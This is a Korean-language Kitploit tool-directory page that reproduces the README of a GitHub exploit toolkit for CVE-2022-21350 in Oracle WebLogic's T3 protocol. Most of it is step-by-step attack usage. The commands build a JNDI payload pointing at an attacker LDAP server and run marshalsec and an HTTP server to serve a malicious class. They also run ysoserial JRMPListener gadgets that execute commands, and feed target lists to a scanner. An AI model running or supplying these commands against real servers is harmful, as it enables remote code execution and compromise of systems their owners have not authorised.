Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-21350 — CVE-2022-21350을 대상으로 하는 Oracle WebLogic T3 프로토콜 익스플로잇 툴킷으로, 페이로드 생성, LDAP/HTTP 서버, 여러 JDK 버전 지원을 포함합니다. | Kitploit
도구/GitHubGitHub/hktalent/cve-2022-21350
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubhktalent/cve-2022-21350

CVE-2022-21350

CVE-2022-21350을 대상으로 하는 Oracle WebLogic T3 프로토콜 익스플로잇 툴킷으로, 페이로드 생성, LDAP/HTTP 서버, 여러 JDK 버전 지원을 포함합니다.

저장소 보기
3332년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

왜 poc가 두 개인가 하나는 com._51pwn.hktalent.CreatJar.main(args); 최소 payload 생성 도구를 만들 때 사용됩니다. 생성 후에는 다른 것을 사용합니다.

CVE-2022-21350_powerBy_51pwn.jar를 실행하여 payload를 빌드할 때 오류가 발생해도 payload 사용에는 영향을 미치지 않습니다.

기타 exp

root@kitploit:~
CVE_2020_2551
CVE_2020_2555
CVE_2020_2883
CVE_2020_14645
CVE_2020_14756
CVE_2020_14825
CVE_2020_14841
CVE_2021_2394
CVE_2022_21306
CVE_2022_21350

사용 방법

1- payload 생성

root@kitploit:~
docker run -d -p 7001:7001 -p 8453:8453 -v $PWD/setDomainEnv.sh:/home/weblogic/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/bin/setDomainEnv.sh hktalent/weblogic:12.2.1.4.0

java -cp CVE-2022-21350_powerBy_51pwn.jar com._51pwn.CVE_2022_21350.Main "t3://127.0.0.1:7001/" "ldap://docker.for.mac.localhost:1389/UpX34defineClass"

2- ldap 서버 시작

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 'http://docker.for.mac.localhost:8888/#UpX34defineClass' 1389

3- http 서버 시작, class 파일 전송용

root@kitploit:~
node httpServer.js

4- payload 전송

root@kitploit:~
py3 ../WeblogicScan.py --tags 21350 -r -v -u http://127.0.0.1:7001
# more
cat ../T3_ver.txt|awk '{print $1}'|py3 ../WeblogicScan.py --tags 21350 -r -v -s  

java -server -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=8453,server=y,suspend=n -Djava.compiler=NONE -cp ysuserial-0.9-su18-all.jar org.su18.ysuserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59"

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59" java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "open /System/Applications/Calculator.app" >>/Users/51pwn/MyWork/TestPoc/JRMPListener.ser

payload 위치

root@kitploit:~
cat test.ser

오류 메시지가 출력되는 이유

오류를 실행해도 payload 생성 및 payload 효과에는 영향을 미치지 않습니다. 실행 시 오류가 발생해도 payload 생성, payload 효과에는 영향을 미치지 않습니다.

공격 방법

root@kitploit:~
nuclei -duc -t ./network/detection/weblogic-t3-detect.yaml -l list.txt

지원 도구:

  • 1-weblogic 버전
  • 12.1.3.0.0
  • 12.2.1.3.0
  • 12.2.1.4.0
  • 2-JDK < 1.8
  • 3-서버가 OOB를 허용

jar 빌드 및 병합 방법

root@kitploit:~
cd lib3
# split 
py3 ../tools/splitTools.py -s wlfullclient_12.1.3.jar
# merge 
py3 ../tools/splitTools.py -m wlfullclient_12.1.3.jar

특별 감사

  • <a href=https://github.com/lz520520>@lz520520
  • <a href=https://github.com/Y4er>@Y4er
도구 다운로드